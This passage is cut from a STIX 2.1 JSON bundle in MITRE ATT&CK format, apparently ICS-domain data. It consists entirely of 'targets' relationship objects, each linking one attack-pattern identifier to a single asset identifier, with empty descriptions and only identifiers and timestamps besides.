"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e59fd2fe-b7d4-4979-a990-9a8d6b44abb0", "created": "2024-07-01T10:37:15.841885", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841886", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d8ac1f89-4c18-4165-b6ae-2e381c7ff231", "created": "2024-07-01T10:37:15.841893", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841895", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f721c3d6-a2f6-40ac-9ddc-b60d01c67c51", "created": "2024-07-01T10:37:15.841902", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841904", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87556681-e9f3-4fc7-8101-f60a317b8d63", "created": "2024-07-01T10:37:15.841912", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841914", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95feb8d8-1b04-432d-9d3f-3f218b7a9823", "created": "2024-07-01T10:37:15.841920", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841922", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a515557e-5a24-4d58-9d6d-00e1342441e9", "created": "2024-07-01T10:37:15.841929", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841931", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6999ba65-ff1c-4b2f-9618-b4f565b602d4", "created": "2024-07-01T10:37:15.841938", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841940", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--899f3ef6-7d88-4ed5-acc1-026bcdcf49b3", "created": "2024-07-01T10:37:15.841947", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841949", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--aa58f231-c98c-41f7-9ff8-8eaa73d61097", "created": "2024-07-01T10:37:15.841956", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841958", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6dd0c1e-28b0-4bff-af70-0be5d3d89684", "created": "2024-07-01T10:37:15.841965", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841967", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9693725e-45d1-4dad-b6a0-656a51ce0af3", "created": "2024-07-01T10:37:15.841974", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841975", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--824add00-99a1-4b15-9a2d-6c5683b7b497", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--43697fac-ba46-474d-8002-53eab5d6d8b7", "created": "2024-07-01T10:37:15.841982", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841984", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5738d025-6f21-47d2-a081-b78c68e99d87", "created": "2024-07-01T10:37:15.841991", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841993", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--698b2a21-31c2-4fa0-8689-3e4f9972208a", "created": "2024-07-01T10:37:15.842000", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842002", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2e089573-c63b-4510-a330-892baf222be4", "created": "2024-07-01T10:37:15.842009", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1075d0d3-2166-448c-863d-07b49f35af22", "created": "2024-07-01T10:37:15.842017", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842019", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f879c817-7eca-4524-830d-33d115d1da2b", "created": "2024-07-01T10:37:15.842026", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842028", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--851e071f-208d-4c79-adc6-5974c85c78f3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d41ebefd-e947-437c-aecd-b221be052ccf", "created": "2024-07-01T10:37:15.842035", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842037", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--499b9386-6aef-43b3-9382-b0b6dd8d0e97", "created": "2024-07-01T10:37:15.842044", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842046", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9bf3c607-31b3-4b3e-a7bd-356bd4e9d2fa", "created": "2024-07-01T10:37:15.842052", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842054", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4be551a5-56f1-4adc-83ba-a344aa5a5452", "created": "2024-07-01T10:37:15.842061", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842063", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f386495-9c3b-4522-acd3-b8aa86abd9f7", "created": "2024-07-01T10:37:15.842070", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842072", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--30f00047-df66-4d7a-8cf9-09dc4b39655f", "created": "2024-07-01T10:37:15.842079", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842081", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--23b116db-fe80-4d2e-8174-2f72951e168b", "created": "2024-07-01T10:37:15.842088", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842089", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bff46c34-7c4a-460e-b1e4-a1b0f3e1f359", "created": "2024-07-01T10:37:15.842097", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842099", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8aa58d1d-d126-4b44-b5a5-023da8ebfc8b", "created": "2024-07-01T10:37:15.842106", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842108", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--41fa5fb0-3bd4-4fd2-abf8-eb8677c521f4", "created": "2024-07-01T10:37:15.842115", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842116", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ce8bf0e4-bf98-499a-8d13-e769958eb0bf", "created": "2024-07-01T10:37:15.842123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f726f64-7be3-4330-84ea-7b9cd81dadab", "created": "2024-07-01T10:37:15.842146", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842148", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f70c3076-b549-4b4a-93e7-1098a42e5067", "created": "2024-07-01T10:37:15.842155", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842157", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57d4e5d0-faa5-43bc-9252-2d9152c4a1d3", "created": "2024-07-01T10:37:15.842163", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842165", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--62531edf-60d8-4015-8f86-948f28fd7072", "created": "2024-07-01T10:37:15.842172", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842174", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--92ef779b-5ea7-4d21-92db-1d05709f0c9c", "created": "2024-07-01T10:37:15.842180", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842182", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fbfbc509-a3b5-47c5-89fa-724e89ad3ae6", "created": "2024-07-01T10:37:15.842189", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842191", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ade04884-128a-4dbd-8cb1-9af55a479e38", "created": "2024-07-01T10:37:15.842198", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842199", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--58178a57-88c1-4db6-b689-6e777b447c22", "created": "2024-07-01T10:37:15.842206", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842208", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1581cdbb-c54e-46e7-a07f-00b6c90d55f5", "created": "2024-07-01T10:37:15.842214", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842216", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b5e8613-a953-4e3c-a786-ed8c06106ac5", "created": "2024-07-01T10:37:15.842223", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842225", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8a09cd0-b62b-4894-89e5-c15b61d9b160", "created": "2024-07-01T10:37:15.842232", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842234", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9e04cb86-375e-4665-811b-23c1ccd1226b", "created": "2024-07-01T10:37:15.842241", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842242", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--099aa581-eb7c-438e-a06c-091dfbacb8ab", "created": "2024-07-01T10:37:15.842249", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.842251", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, 